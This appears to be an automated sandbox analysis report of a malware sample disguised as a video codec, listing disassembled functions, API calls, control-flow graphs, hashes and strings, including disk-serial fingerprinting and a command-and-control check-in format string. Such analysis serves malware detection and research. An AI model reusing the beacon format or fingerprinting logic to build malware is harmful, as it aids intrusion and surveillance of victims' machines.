                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02BCF993
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02BCF9AC
                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02BCF9D1
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 02BCFA5A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                      • API String ID: 514930453-3114217049
                                                                                                      • Opcode ID: fa7ec21407ddee2bdd98b0236ec8416015dbd008f986d4abc5f0b798fd853508
                                                                                                      • Instruction ID: 3a70f35fcb6302baa4ce6acf782b3e0804b99bf06405004a037c0904b0067281
                                                                                                      • Opcode Fuzzy Hash: fa7ec21407ddee2bdd98b0236ec8416015dbd008f986d4abc5f0b798fd853508
                                                                                                      • Instruction Fuzzy Hash: DE219E75A00209ABDF14DBA898806FEFBBAEF05314F2440EFE955E7611DB709945CBA0
                                                                                                      Function 02BCF879 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1409 2bcf879-2bcf8a4 CreateFileA 1410 2bcf8aa-2bcf8bf 1409->1410 1411 2bcf975-2bcf97c 1409->1411 1412 2bcf8c2-2bcf8e4 DeviceIoControl 1410->1412 1413 2bcf91d-2bcf925 1412->1413 1414 2bcf8e6-2bcf8ee 1412->1414 1417 2bcf92e-2bcf930 1413->1417 1418 2bcf927-2bcf92d call 2bd3788 1413->1418 1415 2bcf8f7-2bcf8fc 1414->1415 1416 2bcf8f0-2bcf8f5 1414->1416 1415->1413 1421 2bcf8fe-2bcf906 1415->1421 1416->1413 1419 2bcf96b-2bcf974 CloseHandle 1417->1419 1420 2bcf932-2bcf935 1417->1420 1418->1417 1419->1411 1423 2bcf937-2bcf940 GetLastError 1420->1423 1424 2bcf951-2bcf95e call 2bd3b2c 1420->1424 1425 2bcf909-2bcf90e 1421->1425 1423->1419 1427 2bcf942-2bcf945 1423->1427 1424->1419 1433 2bcf960-2bcf966 1424->1433 1425->1425 1429 2bcf910-2bcf91c call 2bcf6cc 1425->1429 1427->1424 1430 2bcf947-2bcf94e 1427->1430 1429->1413 1430->1424 1433->1412
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02BCF898
                                                                                                      • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02BCF8D6
                                                                                                      • GetLastError.KERNEL32 ref: 02BCF937
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 02BCF96E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                                      • API String ID: 4026078076-1180397377
                                                                                                      • Opcode ID: 7314b262c9ce4fceb271d13f51334884a8dafa86fdee11678af3076091a3bbba
                                                                                                      • Instruction ID: 8331c8ed8f866c170dce7db4deecd9e5a266aef7d8825cbe7f1c7014d0c0408c
                                                                                                      • Opcode Fuzzy Hash: 7314b262c9ce4fceb271d13f51334884a8dafa86fdee11678af3076091a3bbba
                                                                                                      • Instruction Fuzzy Hash: A4318171D00219FBDF18DF95D884ABEBBBAEB05754F2041EFE605A7641D7B09A01CB90
                                                                                                      Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1435 401a4f-401a77 CreateFileA 1436 401b45-401b4a 1435->1436 1437 401a7d-401a91 1435->1437 1438 401a98-401ac0 DeviceIoControl 1437->1438 1439 401ac2-401aca 1438->1439 1440 401af3-401afb 1438->1440 1443 401ad4-401ad9 1439->1443 1444 401acc-401ad2 1439->1444 1441 401b04-401b07 1440->1441 1442 401afd-401b03 call 402ca6 1440->1442 1446 401b09-401b0c 1441->1446 1447 401b3a-401b44 CloseHandle 1441->1447 1442->1441 1443->1440 1448 401adb-401af1 call 402cc0 call 4018cc 1443->1448 1444->1440 1450 401b27-401b34 call 402c98 1446->1450 1451 401b0e-401b17 GetLastError 1446->1451 1447->1436 1448->1440 1450->1438 1450->1447 1451->1447 1453 401b19-401b1c 1451->1453 1453->1450 1456 401b1e-401b24 1453->1456 1456->1450
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                      • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                      • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                                      • API String ID: 4026078076-1180397377
                                                                                                      • Opcode ID: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                                                                      • Instruction ID: fc4aaa1cf60edb7db06fdbd05dea25136cd7d186831ecbc7bbbcf924abbffa34
                                                                                                      • Opcode Fuzzy Hash: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                                                                      • Instruction Fuzzy Hash: 74318B71D00218EADB21AFA5CD849EFBBB9FF41750F20407AE554B32A0E7785E45CB98
                                                                                                      Function 00402199 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrcmpiW.KERNELBASE ref: 00402199
                                                                                                      • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D15A
                                                                                                      • lstrcmpiW.KERNEL32(?,0040915C), ref: 0040D764
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi$CtrlDispatcherServiceStart
                                                                                                      • String ID: test
                                                                                                      • API String ID: 2172614945-3632233996
                                                                                                      • Opcode ID: 5ae61f63a8e06413efbf1cbc6131c1c7aae20cf67e079e7d3b8cd5e39f076596
                                                                                                      • Instruction ID: e6d18fb5675363f103dcfed14c989fe5127fa8abfa2e43cfdb745462f06fff5f
                                                                                                      • Opcode Fuzzy Hash: 5ae61f63a8e06413efbf1cbc6131c1c7aae20cf67e079e7d3b8cd5e39f076596
                                                                                                      • Instruction Fuzzy Hash: 0FF068B4E08201EAEB106FB19E4C67E7754BB09301B30847BA447B11D1CB7C450E6A9F
                                                                                                      Function 0040D487 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /chk
                                                                                                      • API String ID: 0-3837807730
                                                                                                      • Opcode ID: 29d1cf7ffd5baad62fb2cddb07dcb7a5a4ece1c976db70669faed20f2cdf337e
                                                                                                      • Instruction ID: 025942cb242d3d5260985c598898fe5e06497644a84d452e8f5b1ec8b5760f88
                                                                                                      • Opcode Fuzzy Hash: 29d1cf7ffd5baad62fb2cddb07dcb7a5a4ece1c976db70669faed20f2cdf337e
                                                                                                      • Instruction Fuzzy Hash: 8901DCB6C1C902E5E7114AD44D8A8BB2B6CE80A30C7244433D287BA4C3DA7C944F914E
                                                                                                      Function 02BC63E2 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 254COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 213 2bc63e2-2bc63e4 214 2bc643e-2bc6449 213->214 215 2bc63e6-2bc63e7 213->215 216 2bc644b-2bc646d 214->216 217 2bc6497-2bc64ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 214->217 215->214 218 2bc646f 216->218 219 2bc64d7-2bc64ee GetModuleHandleA GetProcAddress call 2bc42c7 216->219 220 2bc64f3-2bc66f1 GetTickCount call 2bc605a GetVersionExA call 2bd4ad0 call 2bd2f8c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2bd4ad0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd2f8c * 4 QueryPerformanceCounter Sleep call 2bd2f8c * 2 call 2bd4ad0 * 2 217->220 221 2bc64ee call 2bc42c7 217->221 222 2bc6471-2bc648a 218->222 223 2bc6443-2bc646d 218->223 219->220 268 2bc66f4-2bc66f6 220->268 221->220 223->218 223->219 269 2bc66ff-2bc6701 268->269 270 2bc66f8-2bc66fd 268->270 272 2bc670e-2bc6742 RtlEnterCriticalSection RtlLeaveCriticalSection 269->272 273 2bc6703 269->273 271 2bc6708 Sleep 270->271 271->272 274 2bc6744-2bc6750 272->274 275 2bc6792 272->275 273->271 274->275 277 2bc6752-2bc675f 274->277 276 2bc6796-2bc72c3 InternetOpenA 275->276 282 2bc7389-2bc738f 276->282 283 2bc72c9-2bc7340 InternetSetOptionA * 3 call 2bd4ad0 InternetOpenUrlA 276->283 279 2bc6767-2bc6768 277->279 280 2bc6761-2bc6765 277->280 281 2bc676c-2bc6790 call 2bd4ad0 * 2 279->281 280->281 281->276 285 2bc73ab-2bc73b9 282->285 286 2bc7391-2bc7397 282->286 294 2bc7382-2bc7383 InternetCloseHandle 283->294 295 2bc7342 283->295 285->268 288 2bc73bf-2bc73e3 call 2bd4ad0 call 2bc439c 285->288 290 2bc739d-2bc73aa call 2bc53ec 286->290 291 2bc7399-2bc739b 286->291 288->268 306 2bc73e9-2bc7417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd231c 288->306 290->285 291->285 294->282 301 2bc7346-2bc736c InternetReadFile 295->301 303 2bc736e-2bc7375 301->303 304 2bc7377-2bc737e InternetCloseHandle 301->304 303->301 304->294 309 2bc746d-2bc7488 call 2bd231c 306->309 310 2bc7419-2bc742b call 2bd231c 306->310 315 2bc748e-2bc7490 309->315 316 2bc7742-2bc7754 call 2bd231c 309->316 310->309 317 2bc742d-2bc743f call 2bd231c 310->317 315->316 318 2bc7496-2bc7548 call 2bd2f8c RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd4ad0 * 5 call 2bc439c * 2 315->318 326 2bc779d-2bc77af call 2bd231c 316->326 327 2bc7756-2bc7758 316->327 317->309 324 2bc7441-2bc7453 call 2bd231c 317->324 383 2bc754a-2bc754c 318->383 384 2bc7585 318->384 324->309 336 2bc7455-2bc7467 call 2bd231c 324->336 337 2bc77d0-2bc77e2 call 2bd231c 326->337 338 2bc77b1-2bc77cb call 2bc61f5 call 2bc6303 call 2bc640e 326->338 327->326 331 2bc775a-2bc7798 call 2bd4ad0 RtlEnterCriticalSection RtlLeaveCriticalSection 327->331 331->268 336->268 336->309 351 2bc77e8-2bc77ea 337->351 352 2bc7b00-2bc7b12 call 2bd231c 337->352 338->268 351->352 356 2bc77f0-2bc7807 call 2bc439c 351->356 352->268 364 2bc7b18-2bc7b46 call 2bd2f8c call 2bd4ad0 call 2bc439c 352->364 356->268 365 2bc780d-2bc78db call 2bd23f8 call 2bc1ba7 356->365 385 2bc7b4f-2bc7b56 call 2bd2f54 364->385 386 2bc7b48-2bc7b4a call 2bc534d 364->386 381 2bc78dd call 2bc143f 365->381 382 2bc78e2-2bc7903 RtlEnterCriticalSection 365->382 381->382 389 2bc790f-2bc7973 RtlLeaveCriticalSection call 2bc3c67 call 2bc3d7e call 2bc8311 382->389 390 2bc7905-2bc790c 382->390 383->384 391 2bc754e-2bc7560 call 2bd231c 383->391 387 2bc7589-2bc75b7 call 2bd2f8c call 2bd4ad0 call 2bc439c 384->387 385->268 386->385 414 2bc75f8-2bc7601 call 2bd2f54 387->414 415 2bc75b9-2bc75c8 call 2bd35c6 387->415 412 2bc7979-2bc79c1 call 2bca6fb 389->412 413 2bc7ae7-2bc7afb call 2bc8fd9 389->413 390->389 391->384 403 2bc7562-2bc7583 call 2bc439c 391->403 403->387 424 2bc79c7-2bc79ce 412->424 425 2bc7ab1-2bc7ae2 call 2bc83c0 call 2bc33b2 412->425 413->268 426 2bc7738-2bc773b 414->426 427 2bc7607-2bc761f call 2bd3b2c 414->427 415->414 428 2bc75ca 415->428 430 2bc79d1-2bc79d6 424->430 425->413 426->316 440 2bc762b 427->440 441 2bc7621-2bc7629 call 2bc970d 427->441 432 2bc75cf-2bc75e1 call 2bd2830 428->432 430->430 434 2bc79d8-2bc7a23 call 2bca6fb 430->434 442 2bc75e6-2bc75f6 call 2bd35c6 432->442 443 2bc75e3 432->443 434->425 449 2bc7a29-2bc7a2f 434->449 446 2bc762d-2bc76e5 call 2bca825 call 2bc3863 call 2bc5119 call 2bc3863 call 2bcaacb call 2bcabe5 440->446 441->446 442->414 442->432 443->442 470 2bc76ec-2bc7717 Sleep call 2bd18d0 446->470 471 2bc76e7 call 2bc380b 446->471 453 2bc7a32-2bc7a37 449->453 453->453 455 2bc7a39-2bc7a74 call 2bca6fb 453->455 455->425 461 2bc7a76-2bc7ab0 call 2bcd0ed 455->461 461->425 475 2bc7719-2bc7722 call 2bc4100 470->475 476 2bc7723-2bc7731 470->476 471->470 475->476 476->426 478 2bc7733 call 2bc380b 476->478 478->426
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                      • API String ID: 0-2678694477
                                                                                                      • Opcode ID: c9af72704825232933f22a183982c931f40f7c98fc8c2f8a605d1a74fb11f001
                                                                                                      • Instruction ID: 7d41fb11bbc7e49bdfe71ebbb0675d7a3643f7d7115855fe44d07f87c1fc6b98
                                                                                                      • Opcode Fuzzy Hash: c9af72704825232933f22a183982c931f40f7c98fc8c2f8a605d1a74fb11f001
                                                                                                      • Instruction Fuzzy Hash: 6981E5B1D483409FE714AF349C05B9BFBE9AF85350F100CAEF9859B242EB749854CB96
                                                                                                      Function 02BC6391 Relevance: 75.5, APIs: 39, Strings: 4, Instructions: 299COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 739 2bc6391-2bc63a1 740 2bc6418-2bc6425 739->740 741 2bc63a3-2bc63a8 739->741 742 2bc645e-2bc646d 740->742 743 2bc6427-2bc643f 740->743 741->740 744 2bc637b-2bc6383 741->744 745 2bc646f 742->745 746 2bc64d7-2bc66f1 GetModuleHandleA GetProcAddress call 2bc42c7 GetTickCount call 2bc605a GetVersionExA call 2bd4ad0 call 2bd2f8c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2bd4ad0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd2f8c * 4 QueryPerformanceCounter Sleep call 2bd2f8c * 2 call 2bd4ad0 * 2 742->746 749 2bc6443-2bc645c 743->749 747 2bc6385 744->747 748 2bc6347-2bc6351 744->748 745->749 750 2bc6471-2bc648a 745->750 799 2bc66f4-2bc66f6 746->799 754 2bc6387-2bc6390 747->754 752 2bc62fb-2bc6302 748->752 753 2bc6353-2bc637a 748->753 749->742 753->744 754->754 800 2bc66ff-2bc6701 799->800 801 2bc66f8-2bc66fd 799->801 803 2bc670e-2bc6742 RtlEnterCriticalSection RtlLeaveCriticalSection 800->803 804 2bc6703 800->804 802 2bc6708 Sleep 801->802 802->803 805 2bc6744-2bc6750 803->805 806 2bc6792 803->806 804->802 805->806 808 2bc6752-2bc675f 805->808 807 2bc6796-2bc72c3 InternetOpenA 806->807 813 2bc7389-2bc738f 807->813 814 2bc72c9-2bc7340 InternetSetOptionA * 3 call 2bd4ad0 InternetOpenUrlA 807->814 810 2bc6767-2bc6768 808->810 811 2bc6761-2bc6765 808->811 812 2bc676c-2bc6790 call 2bd4ad0 * 2 810->812 811->812 812->807 816 2bc73ab-2bc73b9 813->816 817 2bc7391-2bc7397 813->817 825 2bc7382-2bc7383 InternetCloseHandle 814->825 826 2bc7342 814->826 816->799 819 2bc73bf-2bc73e3 call 2bd4ad0 call 2bc439c 816->819 821 2bc739d-2bc73aa call 2bc53ec 817->821 822 2bc7399-2bc739b 817->822 819->799 837 2bc73e9-2bc7417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd231c 819->837 821->816 822->816 825->813 832 2bc7346-2bc736c InternetReadFile 826->832 834 2bc736e-2bc7375 832->834 835 2bc7377-2bc737e InternetCloseHandle 832->835 834->832 835->825 840 2bc746d-2bc7488 call 2bd231c 837->840 841 2bc7419-2bc742b call 2bd231c 837->841 846 2bc748e-2bc7490 840->846 847 2bc7742-2bc7754 call 2bd231c 840->847 841->840 848 2bc742d-2bc743f call 2bd231c 841->848 846->847 849 2bc7496-2bc7548 call 2bd2f8c RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd4ad0 * 5 call 2bc439c * 2 846->849 857 2bc779d-2bc77af call 2bd231c 847->857 858 2bc7756-2bc7758 847->858 848->840 855 2bc7441-2bc7453 call 2bd231c 848->855 914 2bc754a-2bc754c 849->914 915 2bc7585 849->915 855->840 867 2bc7455-2bc7467 call 2bd231c 855->867 868 2bc77d0-2bc77e2 call 2bd231c 857->868 869 2bc77b1-2bc77cb call 2bc61f5 call 2bc6303 call 2bc640e 857->869 858->857 862 2bc775a-2bc7798 call 2bd4ad0 RtlEnterCriticalSection RtlLeaveCriticalSection 858->862 862->799 867->799 867->840 882 2bc77e8-2bc77ea 868->882 883 2bc7b00-2bc7b12 call 2bd231c 868->883 869->799 882->883 887 2bc77f0-2bc7807 call 2bc439c 882->887 883->799 895 2bc7b18-2bc7b46 call 2bd2f8c call 2bd4ad0 call 2bc439c 883->895 887->799 896 2bc780d-2bc78db call 2bd23f8 call 2bc1ba7 887->896 916 2bc7b4f-2bc7b56 call 2bd2f54 895->916 917 2bc7b48-2bc7b4a call 2bc534d 895->917 912 2bc78dd call 2bc143f 896->912 913 2bc78e2-2bc7903 RtlEnterCriticalSection 896->913 912->913 920 2bc790f-2bc7973 RtlLeaveCriticalSection call 2bc3c67 call 2bc3d7e call 2bc8311 913->920 921 2bc7905-2bc790c 913->921 914->915 922 2bc754e-2bc7560 call 2bd231c 914->922 918 2bc7589-2bc75b7 call 2bd2f8c call 2bd4ad0 call 2bc439c 915->918 916->799 917->916 945 2bc75f8-2bc7601 call 2bd2f54 918->945 946 2bc75b9-2bc75c8 call 2bd35c6 918->946 943 2bc7979-2bc79c1 call 2bca6fb 920->943 944 2bc7ae7-2bc7afb call 2bc8fd9 920->944 921->920 922->915 934 2bc7562-2bc7583 call 2bc439c 922->934 934->918 955 2bc79c7-2bc79ce 943->955 956 2bc7ab1-2bc7ae2 call 2bc83c0 call 2bc33b2 943->956 944->799 957 2bc7738-2bc773b 945->957 958 2bc7607-2bc761f call 2bd3b2c 945->958 946->945 959 2bc75ca 946->959 961 2bc79d1-2bc79d6 955->961 956->944 957->847 971 2bc762b 958->971 972 2bc7621-2bc7629 call 2bc970d 958->972 963 2bc75cf-2bc75e1 call 2bd2830 959->963 961->961 965 2bc79d8-2bc7a23 call 2bca6fb 961->965 973 2bc75e6-2bc75f6 call 2bd35c6 963->973 974 2bc75e3 963->974 965->956 980 2bc7a29-2bc7a2f 965->980 977 2bc762d-2bc76e5 call 2bca825 call 2bc3863 call 2bc5119 call 2bc3863 call 2bcaacb call 2bcabe5 971->977 972->977 973->945 973->963 974->973 1001 2bc76ec-2bc7717 Sleep call 2bd18d0 977->1001 1002 2bc76e7 call 2bc380b 977->1002 984 2bc7a32-2bc7a37 980->984 984->984 986 2bc7a39-2bc7a74 call 2bca6fb 984->986 986->956 992 2bc7a76-2bc7ab0 call 2bcd0ed 986->992 992->956 1006 2bc7719-2bc7722 call 2bc4100 1001->1006 1007 2bc7723-2bc7731 1001->1007 1002->1001 1006->1007 1007->957 1009 2bc7733 call 2bc380b 1007->1009 1009->957
                                                                                                      Strings
                                                                                                      • strcat, xrefs: 02BC64DC
                                                                                                      • ntdll.dll, xrefs: 02BC64E1
                                                                                                      • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02BC6739
                                                                                                      • cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02BC666F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$strcat
                                                                                                      • API String ID: 0-3302467957
                                                                                                      • Opcode ID: da55eba371371ebca3731c2f40268c40469857407aba1bcab9f61610ed6fc365
                                                                                                      • Instruction ID: 37eee3021bb3047deb74c2397c19a1d51688f25a4dc41e2bdd0ead3b6a2c39e4
                                                                                                      • Opcode Fuzzy Hash: da55eba371371ebca3731c2f40268c40469857407aba1bcab9f61610ed6fc365
                                                                                                      • Instruction Fuzzy Hash: 0EA128B1D083909FD314AF349C05B9BFBE5EF85310F1008AEF9849B252EB749815CBA6
                                                                                                      Function 02BC1CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1012 2bc1cf8-2bc1d21 CreateEventA 1013 2bc1d52-2bc1d69 CreateEventA 1012->1013 1014 2bc1d23-2bc1d4e GetLastError call 2bd0af0 call 2bc1712 1012->1014 1015 2bc1d9a-2bc1dc4 call 2bd3399 1013->1015 1016 2bc1d6b-2bc1d96 GetLastError call 2bd0af0 call 2bc1712 1013->1016 1014->1013 1023 2bc1e0d-2bc1e0f 1015->1023 1024 2bc1dc6-2bc1dda GetLastError 1015->1024 1016->1015 1027 2bc1e1d-2bc1e23 1023->1027 1028 2bc1e11-2bc1e1b WaitForSingleObject CloseHandle 1023->1028 1034 2bc1ddc-2bc1ddd CloseHandle 1024->1034 1035 2bc1ddf-2bc1de7 1024->1035 1028->1027 1034->1035 1036 2bc1dee-2bc1e08 call 2bd0af0 call 2bc1712 1035->1036 1037 2bc1de9-2bc1dec CloseHandle 1035->1037 1036->1023 1037->1036
                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D11
                                                                                                      • GetLastError.KERNEL32 ref: 02BC1D23
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D59
                                                                                                      • GetLastError.KERNEL32 ref: 02BC1D6B
                                                                                                      • __beginthreadex.LIBCMT ref: 02BC1DB1
                                                                                                      • GetLastError.KERNEL32 ref: 02BC1DC6
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BC1DDD
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BC1DEC
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC1E14
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 02BC1E1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                      • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                      • API String ID: 831262434-3017686385
                                                                                                      • Opcode ID: e0237b752cf0cd3ed1e94973df4898981a7e4dfb6e62faf0621b2084f70f545d
                                                                                                      • Instruction ID: c3e9605aabd4fec92ffa7613ba704b6f1d882026e854eca2cd654dad865b1047
                                                                                                      • Opcode Fuzzy Hash: e0237b752cf0cd3ed1e94973df4898981a7e4dfb6e62faf0621b2084f70f545d
                                                                                                      • Instruction Fuzzy Hash: 703170719003019FDB00EF24C888B6BBBE5EF84754F2049ADF959DB292DB709949CF92
                                                                                                      Function 02BC4603 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1041 2bc4603-2bc463b call 2be53d0 call 2bd0af0 call 2bd3b2c 1048 2bc463d-2bc4645 call 2bc970d 1041->1048 1049 2bc4647 1041->1049 1051 2bc4649-2bc465c call 2bca825 1048->1051 1049->1051 1055 2bc4661-2bc4664 1051->1055 1056 2bc4666-2bc4672 htons 1055->1056 1057 2bc4683-2bc4687 1055->1057 1060 2bc48ae-2bc48c1 call 2bd3b2c 1056->1060 1061 2bc4678-2bc4681 1056->1061 1058 2bc4689-2bc46e4 htonl * 2 htons call 2bc3d7e call 2bc8311 1057->1058 1059 2bc46f1-2bc47f8 call 2bc1ba7 call 2bcdec9 htons call 2bd23f8 call 2bc7cfa call 2bc7cd4 * 2 call 2bc8962 call 2bc8487 1057->1059 1058->1060 1076 2bc46ea-2bc46ec 1058->1076 1113 2bc47fa-2bc4805 1059->1113 1114 2bc4871-2bc487a 1059->1114 1069 2bc48cd 1060->1069 1070 2bc48c3-2bc48cb call 2bc970d 1060->1070 1061->1055 1061->1057 1074 2bc48cf-2bc4917 call 2bca825 call 2bc3c67 call 2bc3d7e call 2bc8311 1069->1074 1070->1074 1094 2bc491d-2bc494a call 2bca6fb 1074->1094 1095 2bc4b38-2bc4b43 1074->1095 1076->1060 1094->1095 1106 2bc4950-2bc495a 1094->1106 1099 2bc4b4a-2bc4b53 1095->1099 1100 2bc4b45 call 2bc380b 1095->1100 1103 2bc4b5a-2bc4b76 call 2bc8962 1099->1103 1104 2bc4b55 call 2bc380b 1099->1104 1100->1099 1104->1103 1110 2bc4a07-2bc4a09 1106->1110 1111 2bc4960-2bc4977 call 2bc8387 1106->1111 1119 2bc4a0a-2bc4a33 call 2bca6fb 1110->1119 1127 2bc499f-2bc49b7 1111->1127 1128 2bc4979-2bc499d htonl * 2 1111->1128 1118 2bc4809-2bc4813 1113->1118 1116 2bc487c call 2bc143f 1114->1116 1117 2bc4881-2bc48a5 call 2bc8962 * 2 